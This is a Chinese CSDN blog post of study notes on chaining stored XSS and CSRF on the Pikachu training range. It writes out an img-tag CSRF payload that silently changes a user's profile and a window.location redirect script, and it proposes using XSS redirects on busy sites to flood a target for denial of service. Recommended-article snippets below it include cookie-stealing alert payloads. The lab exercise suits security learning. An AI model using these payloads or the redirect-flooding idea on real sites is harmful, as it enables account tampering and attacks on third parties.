xss与csrf组合拳加任意url跳转

最新推荐文章于 2024-04-07 11:30:23 发布
最新推荐文章于 2024-04-07 11:30:23 发布
阅读量567 收藏 12
点赞数 14
文章标签: 经验分享 笔记 web安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81368488/article/details/136074902
版权

学习笔记大佬勿喷 qq3661629617

这里用pikachu靶场来练习已知此处用xss漏洞和csrf漏洞简单弹个窗

d71651a6ef56412ab35acb11aae82d96.png

c8a72f54d80c443e94436af4038d08c7.png 

如何将他们结合呢 这里点击修改信息然后抓个包

9092a1ef19db4d5d9370995d6c3b4814.png 

可以发现这里没有任何类似token的校验get传输url这里根据数据包构造一下url

 127.0.0.1/pikachu/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=kenny&phonenum=qq3661629617&add=qq3661629617&email=qqqq3661629617&submit=submit

 

 

直接访问这个url就可以直接修改上面的参数 经典的csrf 然后通过存储型xss的img标签来加载这段url 只要别人一访问就可以修改上面的信息

<img src="http://127.0.0.1/pikachu/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=kenny&phonenum=qq3661629617&add=qq3661629617&email=qqqq3661629617&submit=submit

">

这里必须加上我们的协议我也是在这里踩坑了快半小时 幸好有大佬指导呜呜呜不加协议就会404

aef29392eb1842c5b3f12569c004405b.png

 如上图就是没加协议呜呜呜

现在加上协议后就可以成功结合我们的两个漏洞了

df963b9053884072935c75426731cccf.png

可以发现我们添加的js代码已经镶嵌在网页上 

57ea9149d3fd42978fcd23f9ad164b31.png 

9f2bef25d3b740c3aa182a4c21bde77b.png

刷新就可以自动加载我们构造的url可以看右下角成功修改

然后就是url跳转了 构思了一下假如一个流量很大的网站存在xss url跳转将跳转的网站设置为我们想要攻击的目标就会造成拒绝服务

<script>window.location.href='';</script>

在href后面添加url 插入框内刷新就会直接跳转到我们的url这里拿百度为例子

09e6e9c7ad9340c192f30c1cb13610be.png

可以看到也是成功跳转到百度 

kenny323
关注
  • 14
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
14. Web安全—渗透测试用例—CSRF测试
weixin_43567873的博客
03-24 71
14. Web安全—渗透测试用例—CSRF测试
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 7972
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
html语言%3chr %3e,百度反射xss/url跳转小礼包
weixin_42302872的博客
06-01 1032
一键分享页面:http://s.share.baidu.com/mshare?click=1&url=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2F&uid=&to=mshare&type=text&relateUid=&pic=http%3A%2F%2Fshare.bai...
XSS CSRF SQL注入 URL跳转漏洞 点击劫持 web安全
最新发布
m0_37685866的博客
04-07 2234
CSRFXSS,SQL注入,URL跳转漏洞,点击挟持等WEB安全问题
XSS技巧拓展】————18、一个URL跳转引发的一系列“惨案”
Fly_鹏程万里
01-21 2685
前言 在知乎的题目和答案中,插入的链接都会变成https://link.zhihu.com/target=xxx的形式进行URL跳转,如下图。然而这个看似简单的功能的实现上,曾引发过一系列的问题,过程挺精彩,所以我就来做个总结,以重新体验一下这个过程。声明:以下小节中提到的问题均来自WooYun已经公开的漏洞,复现的代码也是纯属我个人YY。 0x00 没有任何过滤 案例:知乎 URL 跳...
安全测试4_客户端的安全漏洞(XSSCSRF、点击劫持、URL跳转
weixin_30273175的博客
01-08 594
那个fanh前面学习的都是基础,现在开始正式学习下安全的知识,这一章主要讲解客户端常见的安全漏洞。 看到这个不错,给大家记一下:   1.常见的安全事件:   2.XSS(跨站脚本),英文全称:Cross Site Script 危害:盗取用户信息、钓鱼、制造蠕虫等。 XSS攻击的特点就是:尽一切办法在目标网站上执行非目标网站上原有的脚本.   3.XSS分类: (...
xss跳转代码_XSS之Beef神器
weixin_39821189的博客
11-20 508
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2前言Beef 是目前最为流行的 web 框架攻击平台,...
【干货】XSS知识总结
hackzkaq的博客
10-27 6688
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
逻辑漏洞总结
weixin_46022050的博客
03-02 985
借鉴文章:https://www.freebuf.com/articles/web/225770.html 1、前台模块 1、短信轰炸 参数修改短信轰炸,可以直接修改手机号或者其他参数 Cookie短信轰炸 根据业务的判断 2、手机号遍历枚举 绕过风控继续遍历 简单遍历结 绕过风控方法:修改下面参数,让其构成一个正常参数从而实现绕过 3、绕过验证 删除参数,删除验证码参数导致验证码被绕...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7063
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
xss跳转代码_XSS(跨站脚本攻击)
weixin_39564831的博客
11-20 1774
XSS攻击流程 1、攻击者将恶意代码注入到服务器中 2、用户在没有防备的情况下访问服务器 3、服务器将含有恶意代码的网页响应给客户端 4、在客户端浏览器中触发恶意的JS代码XSS危害 1、盗取各种用户账号 2、窃取用户Cookie资料,冒充用户身份进入网站 3、劫持用户会话,执行任意操作 4、刷流量,执行弹窗广告 5、传播病毒XSS漏洞的验证 POC 漏洞的验证与检测 E...
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 963
0X00前言前段时间有幸和大佬们参了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 552
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
xss跳转代码_XSS漏洞原理
weixin_39592315的博客
11-21 754
通过给定异常的输入,黑客可以在你的浏览器中,插入一段恶意的 JavaScript 脚本,从而窃取你的隐私信息或者仿冒你进行操作。 在理解漏洞之前,要先动一个概念即通源策略通源策略说到XSS不得不提“SOP同源策略”与URLhttp://store.company.com/dir/page.html进行源对比反射型XSS反射型XSS原理当Web应用程序使用动态页面向用户显示搜索结果时,便会造成一种常...
URL跳转攻击
问题定位
11-20 3488
原文URL:http://blog.sina.com.cn/s/blog_64aa073d01011shx.html 0 引子   做个测试,点击新浪的短URL http://t.cn/zO5YXKe ,可许你会觉得浏览器一顿,然后跳转到百度首页。 其实这个URL会让你的浏览器请求5次t.cn,并做了5次无甚意义的跳转,最终才到达百度。不过,对你的电脑没伤害,这个请不用担心。不过这个思路也可
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2327
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
XSS跨站测试代码大全
MyDriverC
12-18 564
‘>alert(document.cookie) =’>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert(‘XSS’)%3C/script%3E alert(‘XSS’) %0a%0aalert(\”Vulnerable\”).jsp %22%3cscript%3ea
XSS跨站脚本
weixin_45735361的博客
02-22 224
XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆, 故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的 cookie介绍 cookie是在HTTP协议下,服务器或脚本可以维护客...
web安全XSS攻击原理及防范
m0_69940800的博客
05-04 1007
代码如下: 点击一样也会弹窗窗口的。也会一样执行xss攻击的。 使用location/location.href/location.replace/iframe.src 造成的XSS 如下代码: 刷新下页面,也会弹出窗口执行 xss攻击了。 [](()cookie安全策略 ============================================================================= 在服务器端设置cookie的时候设置 http-only,...
xss+csrf组合拳
09-20
XSSCSRF是两种常见的网络安全漏洞。当它们结合在一起时,会构成一种更危险的攻击方式,被称为"XSS CSRF组合拳"。下面是一种可能的攻击方式: 1. 攻击者在恶意网站B中插入CSRF payload,并使用该CSRF payload修改用户在A网站的昵称为XSS payload。 2. 攻击者诱使用户访问恶意网站B,触发CSRF payload,导致用户在A网站的昵称被修改为XSS payload。 3. 当用户重新访问A网站时,XSS payload会被触发,从而获取到用户的Cookie信息。 为了防御这种攻击,可以采取以下措施: 1. 在服务端对用户输入进行严格的过滤和验证,特别是在对用户输入进行展示的地方,避免将用户输入作为代码执行。 2. 对于敏感操作,使用CSRF Token来验证请求的合法性。确保每个请求都包含一个随机生成的Token,并在服务端验证该Token的有效性。 3. 在Cookie中使用HttpOnly属性,以防止JavaScript通过document.cookie来获取Cookie信息。 4. 设置合适的Content Security Policy (CSP)来限制页面中可以载的资源和代码。 以上是一种常见的XSS CSRF组合拳攻击方式以及相应的防御措施,但仍然有其他的攻击方式和防御策略。建议综合使用多种防御措施以提高系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值